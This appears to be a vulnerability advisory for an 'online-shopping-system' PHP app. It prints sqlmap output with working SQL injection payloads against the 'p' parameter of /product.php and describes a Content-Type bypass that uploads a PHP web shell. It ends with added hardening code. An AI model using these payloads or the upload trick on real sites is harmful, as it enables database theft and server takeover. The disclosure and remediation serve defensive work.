The online-shopping-system is vulnerable to unauthenticated error/boolean-based blind & error-based SQL Injection attacks.
The p parameter on the /product.php page does not sanitize the user input; an attacker can extract sensitive data from the underlying MySQL database.
Poc's
SQLMAP PAYLOADS
p parameter on the /product.php page
pocs
GET parameter 'p' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:
---
Parameter: p (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=72 AND 2037=2037
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: p=72 AND (SELECT 1432 FROM(SELECT COUNT(*),CONCAT(0x7178707671,(SELECT (ELT(1432=1432,1))),0x716b6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=72 AND (SELECT 2289 FROM (SELECT(SLEEP(5)))LMdY)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: p=72 UNION ALL SELECT CONCAT(0x7178707671,0x4b71516d647848537741636571634e5a416a6a7a716367744d47654778554952467778625161716f,0x716b6a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[20:26:43] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
affected by Arbitrary File Upload
Affected by Arbitrary File Upload at add_products line 22. Only the Content-Type is verified, so one can modify the Content-Type:
image/jpeg
The file path is ../product_images/1635249699_shell.php
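The two findings above share one root cause: client-controlled values (the `p` parameter and the upload's Content-Type) are trusted as-is. The following is an added example of how both could be hardened. It is not the project's code or part of the original report, and the function names, the `products` table and the `product_id` column are assumptions.

```php
<?php
// Added example. Hypothetical names: fetch_product, store_product_image,
// the `products` table and its `product_id` column.

// 1) product.php: treat `p` as an integer and bind it, never concatenate it.
function fetch_product(mysqli $db, $rawId)
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;                    // e.g. "72 AND 2037=2037" is rejected here
    }
    $stmt = $db->prepare('SELECT * FROM products WHERE product_id = ?');
    $stmt->bind_param('i', $id);        // value travels separately from the SQL text
    $stmt->execute();
    return $stmt->get_result()->fetch_assoc();   // get_result() needs mysqlnd
}

// 2) add_products: decide the type from the file's bytes, not from the
//    client-supplied Content-Type ($_FILES[...]['type']).
function store_product_image(array $file, $destDir)
{
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }

    // Server-side content sniffing; the request header plays no part.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = (string) $finfo->file($file['tmp_name']);
    if (!isset($allowed[$mime]) || getimagesize($file['tmp_name']) === false) {
        return null;
    }

    // Server-chosen name and extension: the uploaded name (e.g. shell.php)
    // never reaches the filesystem. random_bytes() requires PHP 7+.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($destDir, '/') . '/' . $name;

    return move_uploaded_file($file['tmp_name'], $dest) ? $name : null;
}
```

A file can be a valid image and still contain PHP, so the content check alone is not sufficient: the forced extension matters, and the web server should be configured not to execute PHP under `product_images/`.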